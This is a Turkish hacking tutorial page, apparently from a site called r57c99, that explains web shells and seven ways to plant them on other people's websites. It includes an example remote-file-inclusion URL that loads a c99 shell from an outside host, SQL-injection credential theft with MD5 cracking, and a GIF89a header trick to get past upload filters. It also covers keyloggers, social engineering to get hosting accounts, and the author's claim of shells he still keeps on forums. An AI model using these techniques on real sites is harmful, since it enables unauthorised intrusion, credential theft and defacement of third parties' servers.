[ home ] [ Shell Kullanımı ] [ Shell ] [ Video ]
r57c99
[ Shell Codes ]
 Shell Nedir? Nasil Atilir? Neye Yarar?
  Sorular. Maddeler. Basliklar.

1) shell nedir?
2) shell Nasil Atilir?
3) Kac Tur shell Vardir?

Cevaplar.

1) shell nedir?

shell Yuklendigi Sitede Size Çesitli Yetkiler Veren Bir Materyaldir. Bu Yetkiler; Okuma, Yazma ve Silme Yetkileridir. shell Attiginiz Sitede Bazen Bir Site Sahibinin Yetkilerini Kullanabilirken, Bazende Host Sahibinin Yetkilerini Kullana Biliyorsunuz. Bu Olaya Permission Yetkisi Diyebiliriz.

Permissionlari Acik Olan Bir Sunucuda Istediginiz Butun Dosya ve Klasori Okuyabilir, Silebilir veya Yukleme Yapabilirsiniz. Permissionlari Kapali Bir Sunucuda Ise Bu Yetkiler Sinirlidir. Tam Yetkiye Ulasabilmeniz Icin Serveri Rootlamaniz Gerekmektedir.

Bir shelli En Iyi Shelikde Kullanabilmek Icin shell Komutlarini Iyi Bilmek Gerekir. Bunun Sebebi Ise Sinirli Yetkiniz Olan Sunucularda Tam Yetkiye Sahip Olmaniz Icindir.

Bir Çok Sunucuda Manuel Gecislere Izin Verilmektedir. Spoll/Mail Kismindan Sunududaki Diger Sitelerin Kullanici Adini Ögrenerek Adres Çucugundan Manuel Gecislerde Yapabilirsiniz.

Bazi Durumlarda Ise shell Yukledigimiz Sitede Ya Permissionlar Sinirli Yetkilere Sahiptir, Yada Yine Sadece Yukledigimiz Sitede Sinirsiz Yetkiye Sahip Olabiliyoruz. Burada Sinirsiz Yetkimiz Var Ise ve Sadece Index Atip Çikmak Istiyorsak Index.php Dosyamizi Upload Eder Çikariz. Eyerki Yetkilerimiz Sinirlandirilmis Ise Sitedeki Config Dosyalarini Okuyarak SQL Ile Baglanti Saglaya Biliriz.

shelli Ne Icin ve Hangi Asamalarda Kullandigimizi Hacker Diliyle Anlattim Bir Diger Maddeye Gecelim. Bu Maddemizde Anlamadigin veya Yeniden Anlatilmasini Istediginiz Bir Yer Olursa Konu Aldinda Belirtiniz.

2) shell Nasil Atilir?

Asamalari:
* Remote File Iclusion Aciklarindan Faydalanabiliriz
* SQL Injection Aciklarindan Faydalanabiliriz
* Exploits Kullanarak Yukleme Yapabiliriz
* Upload Aciklarindan Faydalanabiliriz
* Logger vb Spy Yazilimlardan Faydalanabiliriz
* Hedef Sunucudan Hesap Acarak Yukleme Yapabiliriz
* Sosyal Muhendislik Kullanarak Yukleme Yapabiliriz

1) Remote File Inclusion Aciklarini Kullanarak .Txt Uzantili shellimizden Yukarida Bahsetigim Yetkiler Çercevesinde (Permissionlar) Istedigimiz Gibi .Php Uzantili shell Yukleyebiliriz. veya Baglandigimiz .Txt shell ile Yine Sunucu Yetkileri Çercevesinde Alt Dizinlere Gecebiliriz yada Indeximizi Upload Eder Çikariz.

Örnek:

http://www.siteadi.com/Index.php?denetim=Http://siteadi.com/c99.txt?

Ile Baglandigimiz Siteye .php Uzantili shelli Upload Edersek Kullanimi Su Sekilde Olur.

http://www.siteadi.com/c99.php

Seklinde Kullanima Gecebiliriz.

RFI Konusunu Artik Bilmeyen Yok Suanda RFI Bitmesede Çok Nadir Rastlanan Aciklar Haline Deldi. Bu Yuzden Butun Hakcing Bilgilerinizi RFI Acigina Baglamayin.

2) SQL Injection Acigiyla Nasil shell Atacaz. Öncelikle SQL Acigini Kullanmasini Bilen Mantigi Hemen Anlar, nedir Bu Mantik? SQL Kodlari Yardimiyla Site Sahibinin Kullanici Adi ve Sifresini Elde Ediyoruz. Kimi Zaman MD5 Seklinde Sifre Gelir, Bizde MD5 Cracker Yardimiyla Kirariz.

Elde Ettigimiz Kullanici Adi ve Sifre Ile Siteye Giris Yapariz Admin Panelden Bir Upload Yeri Bulur shell Dosyamizi (.php veya .asp) Upload Ederiz ve Yine Sunucuya Baglanmis Oluruz.

SQL Suanda Kullanilan Yaygin Hacking Yontemlerinden Biridir. Çok Buyuk Sitelerde Bile Rastlanan Hic Degilse Her Serverde En Az 1 den Fazla Sitede Rastlanan Aciktir.

3) Exploits Kullanarak shell Atabiliriz Buda Yine Derlenmis Exploitler Sayesinde Sitenin Admin Bilgilerini (kullanici adi ve sifresini) Elde Ederek Admin Panelden shell Upload Edebiliriz ve Yine Sunucuda Yetkilerimiz Dahilinde Islem Yapabiliriz.

Buna Soyle Bir Örnek Vereyim, Bir Donem IPB Forumlarinda Exploits Sayesinde Admin Sifrelerine Ulasabiliyorduk. Hala Çogu IPB Forumlarinda shellerim Bulunmakta.

4) Upload Aciklarindan Faydalanarak Sitelere shell Yukleyebiliriz. Burada Genellikle .php veya .asp Uzantili shellerimizi Kabul Etmeyen Upload Siteleriyle Karsilasiyoruz. Bunun Icin shell Icine GIF89;a Yazisini Ekleyerek Upload Sayfasinin Yukleyecegimiz shelli Resim Dosyasi Olarak Gormesini Saglariz.

Aklinizin Almayacagi Kadar Çok Upload Dosyalari Vardir. Bunlardan En Çok Kullanilan Bir Iki Tanesini Yazayim.

upload.php , upload.asp , upload.htm , upload.php

Bu Uzantilari ve Upload Sayfalarini Hayal Gucunuze Bagli Çogalta Bilirsiniz.

5) Hic Tavsiye Etmedigim ve Hic Kullanmadigim Ancak Buda Bir Hacking Yontemi Oldugu Icin Aciklamak Zorunda Kaldigim Bir Yontem. Logger vb Spy Yazilimlar Sayesinde shell Nasil Atilir? Öncelikle Hedef Sitemizin Adminini Buluyoruz Gerekli SM vb Islemleri Gerceklestirdikten Sonra Loggeri Yedirip Admin Sifreleride Dahil Olmak Üzere FTP ve Mail Sifrelerini Aliriz. Aldigimiz Sifreler Sayesinde Site Sahibinin Yetkilerini Almamiza Ragmen FTP Sine Girdigimiz Sitenin Sunusunada Ulasmak Istiyorsan shell Upload Eder ve Yetkilerimiz Çercevesinde Izinlerimizi Kullanarak Siteyi veya Serveri Hackleye Biliriz.

6) Bu Maddemizde Ise Diyelimki Hedef bir Site var. Sitede Her Seyi Yapmamiza Ragmen Bir Turlu Acik Bulamadik. Genelde Son Çare Olarak Kullanilan Bu Yontemle Hostcuyla Irtibata Gecer SM Yaparak Sunucudan Bir Hesap Acariz Actigimiz Hesapta Goz Boyamak Adina Ufak Tefek Portallar Kurar ve FTP mize shell Atarak Serveri Rootlar Hedef Siteye Ulasiriz veya Manuel Geciler Yaparakda Hedef Siteye Ulasabiliriz.

7) Sosyal Muhendislik Yontemiyle Siteye shell Yukleye Biliriz. Burada Isin Icine SM Girdigi Icin Belirli Bir Yontem Yoktur. Ancak SM Yapan Kisinin Kabiliyetine Baglidir. Bir Kisi Sosyal Muhendislik Yapabilecek Kabiliyetteyse Çok Kolay ve Rahat Bir Sekilde Çesitli Yollarla Siteye veya FTP ye Ulasarak shell Atabilir.

shell Nasil Atilir Maddemizde Burada Bitmistir. Yukarida Belirttigim 7 Madde Çogaltilabilir. Bu Konuda da Anlamadiginiz veya Daha Detayli Anlatmami Istediginiz Yerleri Konu Altina Belirtirseniz Farkli veya Daha Genis Anlatimlar Yapabilirim.

3) Kac Tur shell Vardir?

Genel Olarak Kullanilan 2, 3 Çesit shell Vardir. Bunarin Uzantilari .php, .asp ve .aspx Dir. Suanda Zannediyorum 100 lerce shell Var Ancak Hemen Hemen Hepsinin Çalisma Mantigi Ayni.

Encok Kullanilan sheller:

C99.php (Yeni Baslayanlar Icin Kullanimi Kolay Bir shell)
R57.php ( shell Olayini Artik Çozmus Kod Bilgisine Doken Kisiler Kullaniyor)
CyberSpy5.asp ( Genelde Kullandigim sheller Arasindadir.)
LORD.aspx ( Zaman Zaman Kullandigim Bir shelldir.)
c99 veya r57 .txt sheller ( Bunlar RFI Icin Kullanilan shellerdir)
NOT: RFI de .asp shell veya .php shell Kullanilmaz.

Simdi Soyle Bir Bakalim.

.php Uzantili sheller Unix, Linux, FreeBSD Sunucularinda Kullanilir.
.asp Uzantili sheller Ise Windows Sunucularda Kullanilir.

Simdi Siz Bir Linux Servere .asp Uzantili shell Atamazsiniz Atsaniz Dahi Çalistiramazsiniz.

Ancak Windows Serverlere Nadirende Olsa Rastlamisimdir. .php Uzantili sheller Atilabiliryor. Ancak .asp shell Kadar Yetki Vermiyor. Genelde Editleme Yetkisine Rastladim. Yukleme ve Silme Yetkileri Bulunmamakta.

Bu Yuzden shell Yukleyeceginiz Sitenin Sistemi Iyi Bilmeniz Gerekiyor.


send all submissions to adsense[at]@hotmail[dot]com

Copyright © 2007-2015 r57c99.com